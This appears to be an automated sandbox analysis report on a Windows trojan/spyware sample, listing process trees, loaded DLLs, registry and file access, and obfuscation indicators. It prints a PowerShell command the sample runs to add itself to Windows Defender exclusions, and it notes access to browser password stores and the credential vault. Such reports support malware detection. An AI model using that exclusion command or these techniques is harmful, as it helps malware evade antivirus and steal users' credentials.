                Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 046E7E54 appears 107 times
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 0470EA12 appears 86 times
                Source: SW_48912.scr.exeStatic PE information: invalid certificate
                Source: SW_48912.scr.exe, 00000000.00000002.1940240799.0000000008630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000000.00000002.1932164126.0000000006BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000000.00000000.1691490425.0000000000082000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeexK.exe. vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000000.00000002.1913900446.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000000.00000002.1923740023.0000000003596000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000005.00000002.2040409716.00000000014DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SW_48912.scr.exe
                Source: SW_48912.scr.exeBinary or memory string: OriginalFilenameeexK.exe. vs SW_48912.scr.exe
                Source: SW_48912.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: SW_48912.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, m94X3h6Xj5LqJ81Tpq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, m94X3h6Xj5LqJ81Tpq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@11/7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SW_48912.scr.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMutant created: \Sessions\1\BaseNamedObjects\vGgvonyzfyGgeBbgbQCvrTvs
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_br0ujbvr.zeo.ps1Jump to behavior
                Source: SW_48912.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SW_48912.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\SW_48912.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sdchange.exe, 0000000A.00000002.3538625637.0000000002A37000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2218139573.0000000002A37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SW_48912.scr.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\SW_48912.scr.exe "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Users\user\Desktop\SW_48912.scr.exe "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
                Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Users\user\Desktop\SW_48912.scr.exe "C:\Users\user\Desktop\SW_48912.scr.exe"Jump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SW_48912.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SW_48912.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SW_48912.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sdchange.pdbGCTL source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000002.3538929854.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kygSlzwdnMXWUy.exe, 00000009.00000000.1963179384.000000000070E000.00000002.00000001.01000000.0000000D.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3538501337.000000000070E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: SW_48912.scr.exe, 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2042250826.00000000044B8000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2040130480.0000000004302000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SW_48912.scr.exe, SW_48912.scr.exe, 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 0000000A.00000003.2042250826.00000000044B8000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2040130480.0000000004302000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdchange.pdb source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000002.3538929854.0000000000E68000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.cs.Net Code: bRKiWHK7WF System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.cs.Net Code: bRKiWHK7WF System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06674902 push eax; ret 0_2_06674909
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06674900 pushad ; ret 0_2_06674901
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B846A6 pushfd ; ret 0_2_06B846A7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0041185B push cs; ret 5_2_004118E4
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004120DF push edx; iretd 5_2_004120F7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004120E3 push edx; iretd 5_2_004120F7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004118BC push cs; ret 5_2_004118E4
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00418100 push 00000000h; ret 5_2_00418107
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004141B7 pushad ; iretd 5_2_004141B8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00403310 push eax; ret 5_2_00403312
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00406557 push ebp; retf 5_2_00406559
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040A523 push edi; ret 5_2_0040A52D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00416DF8 push es; ret 5_2_00416E01
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00418D94 push cs; iretd 5_2_00418D95
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00423673 push edi; iretd 5_2_0042367C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0041A7E7 push edx; retf 5_2_0041A7EA
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013B225F pushad ; ret 5_2_013B27F9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013B27FA pushad ; ret 5_2_013B27F9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E09AD push ecx; mov dword ptr [esp], ecx5_2_013E09B6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013B283D push eax; iretd 5_2_013B2858
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013B1344 push eax; iretd 5_2_013B1369
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046627FA pushad ; ret 10_2_046627F9
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0466225F pushad ; ret 10_2_046627F9
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0466283D push eax; iretd 10_2_04662858
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046909AD push ecx; mov dword ptr [esp], ecx10_2_046909B6
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0466135E push eax; iretd 10_2_04661369
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02720360 push edi; iretd 10_2_02720369
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0272035D push edi; iretd 10_2_02720369
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270E548 push cs; ret 10_2_0270E5D1
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270E5A9 push cs; ret 10_2_0270E5D1
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02714DED push 00000000h; ret 10_2_02714DF4
                Source: SW_48912.scr.exeStatic PE information: section name: .text entropy: 7.785959501296895
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, r9j0NhBG7VqKxGXCdS.csHigh entropy of concatenated method names: 'ILJXgCYsC3', 'KeAXKiaWRD', 'aJFXWu6lmb', 'fCDXmCOvHA', 'WygXkeEYpp', 'lR6XYJsGBd', 'WL4Xdfmt08', 'mrcX62oId2', 'mREXCkpQyV', 'wHAXPYY6yB'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, UiyJH6SvVYbQ0dGbb2.csHigh entropy of concatenated method names: 'T2dZxhOnAm', 'cZZZpTUN0D', 'fnOZJ7ZP0F', 'C8oZFbIKSG', 'pbyZvLoBk4', 'lwkZE6fKAj', 'dEyZR7wFv5', 'Qj0Z7xeBUw', 'MXmZBdj4j2', 'JkPZc149E1'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, n9y3C8oW1f1VmVSpTJ.csHigh entropy of concatenated method names: 'vJ8W8w5rc', 'yDYmR1Kqr', 'LBtYoXVZO', 'dLxdyD89n', 'OIBCHmwcC', 'hD7PiMJ39', 'MS9PyyK1y2pRMI8A5y', 'OhC2cekGu0WEfAKk31', 'LIcQmyfIB', 'poGTkBkmw'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, ix1KuNDjeYkrDHmaNB.csHigh entropy of concatenated method names: 'AqufuYgQHa', 'TR7fjh1KCf', 'ToString', 'zSsfL0Pahw', 'qNFfaijCjF', 'E6Af8ldcZm', 'vwlfyOsNKN', 'qumfHcYbsa', 'KlvfXneQUw', 'Oy8fA47mbA'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.csHigh entropy of concatenated method names: 'RbAUMBsbHh', 'jKRULYHmHB', 'J3GUaxp0l1', 'K0SU87s07C', 'vZTUygYq4g', 'iK5UHIAnNS', 'f0hUXNkrrN', 'yJZUAifWVH', 'MQ5U5JVvbW', 'xg0UurKomU'
